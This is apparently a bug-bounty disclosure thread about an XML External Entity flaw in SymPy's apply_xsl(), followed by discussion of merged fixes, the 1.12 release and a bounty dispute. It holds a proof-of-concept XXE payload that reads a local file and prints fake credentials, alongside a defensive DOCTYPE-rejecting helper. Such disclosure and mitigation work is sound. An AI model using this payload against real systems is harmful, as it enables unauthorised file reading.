XML External Entity (XXE) injection in sympy in sympy/sympy
Mar 29th 2023
SymPy is an open-source computer algebra system written in pure Python.
SymPy is vulnerable to an XML External Entity (XXE) injection in the apply_xsl() functionality of SymPy due to the usage of
Proof of Concept
```python
# PoC.py
from sympy.utilities.mathml import apply_xsl

xsl = 'mathml/data/simple_mmlctop.xsl'
# The DOCTYPE below was stripped from the page as extracted; it is
# reconstructed from the entity name used in the document and the
# file path the maintainer quotes later in the thread.
mml = '''<?xml version="1.0" ?>
<!DOCTYPE userInfo [
  <!ENTITY ent SYSTEM "file:///d:/test/sensitive.txt">
]>
<userInfo>
  <firstName>John</firstName>
  <lastName>&ent;</lastName>
</userInfo>
'''
res = apply_xsl(mml, xsl)
print(res)
```
```xml
<userInfo>
  <firstName>John</firstName>
  <lastName>
    SENSITIVE INFORMATION. USERNAME: TEST PASSWORD: TEST
  </lastName>
</userInfo>
```
As this is vulnerable to XXE, it may lead to arbitrary file read, DoS, or SSRF.
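As an added example (not SymPy's own code, and not necessarily what the linked PRs merged), a stdlib-only gate that refuses any document carrying a DOCTYPE or entity declaration before the text reaches an XSLT step such as apply_xsl(); MathML never needs a DOCTYPE, so rejecting it outright is the usual XXE mitigation. The helper names and the placeholder file path are assumptions.

```python
import xml.parsers.expat
from xml.etree import ElementTree as ET


class UnsafeXMLError(ValueError):
    """Raised when input declares a DOCTYPE or entities (possible XXE)."""


def reject_doctype(xml_text: str) -> None:
    """Scan with expat and raise UnsafeXMLError on any DOCTYPE or
    <!ENTITY> declaration. An exception raised inside an expat handler
    propagates out of Parse(), so scanning stops at the first offending
    declaration and no entity is ever expanded or fetched."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE {name!r} not allowed in MathML input")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXMLError(f"entity declaration {name!r} not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_text, True)


def is_safe_mathml(xml_text: str) -> bool:
    """True if the text may be passed on to the XSLT step, False otherwise
    (malformed XML is rejected as well)."""
    try:
        reject_doctype(xml_text)
    except (UnsafeXMLError, xml.parsers.expat.ExpatError):
        return False
    return True


def safe_fromstring(xml_text: str) -> ET.Element:
    """Gate first, then parse with the stdlib parser."""
    reject_doctype(xml_text)
    return ET.fromstring(xml_text)


# Constructed samples: benign MathML, and a document shaped like the PoC
# above but pointing at a placeholder path rather than a real file.
SAFE_MML = '<math><mi>x</mi><mo>+</mo><mn>1</mn></math>'
XXE_MML = ('<?xml version="1.0"?>\n'
           '<!DOCTYPE r [<!ENTITY ent SYSTEM "file:///PLACEHOLDER/secret.txt">]>\n'
           '<r>&ent;</r>')
```

Call reject_doctype() (or is_safe_mathml()) on untrusted input before passing it to apply_xsl(); the gate never expands the entity, so the file is never read.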
@maintainer Please use the above patch to mitigate this vulnerability. Thanks.
@admin Can you please check the comments in https://github.com/sympy/sympy/pull/24997. And send this report to appropriate people. Thanks.
Can you please explain the attack vector here? If you use Python, you can just open the file d:/test/sensitive.txt directly using
A PR has been merged to fix this: https://github.com/sympy/sympy/pull/25007
Also another PR for the imminent 1.12 release: https://github.com/sympy/sympy/pull/25010
Can you confirm if that fixes the issue?
Hi @maintainer, tested on the latest code base, and I can confirm that the issue is resolved.
Can you please validate this issue, confirm the fix and assign a CVE? Thanks.
Hi @maintainer, version 1.12 is released with the fix, can you please
Mark this as VALID and add the patch!
Hi @admin / @psmoros, I saw a comment in sympy which says
Hi team! To shed some light on what we do; a company that depends on SymPy is sponsoring security research into your project: up to per valid vulnerability for the researcher and for the maintainer.
Can you please allocate the bounty as per the comments? Thanks.
Hi @admin, can you please help the maintainer to solve the issue like how to add the patch in comment?
Just a reminder to adjust the disclosure bounty up to $1040 per valid vulnerability.
And help the maintainer to add patches. Thanks.
Hi @admin, gentle reminder for the above ^^
Hey ready-research, I've reached out to @psmoros to get more information on this :)
Is there anything I should be doing here? The issue is fixed now and the fix is released.
Yes, please mark it as fixed and publish it using the green button above the comment section "Mark as fixed"
@psmoros @admin, can you please also look into the issue with the disclosure bounty? Thanks.
Hi @admin, can you please also look into the issue with the bounty?
@psmoros @Pavlos @benharvie @adam-nygate
What's the issue with the bounty?
Hi @psmoros, https://github.com/sympy/sympy/pull/24997#issuecomment-1493015185 As per the comments, the disclosure bounty is up to $1040 per valid vulnerability, but here we have only $75. Can you please adjust the bounty to $1040?
@admin @Pavlos ^^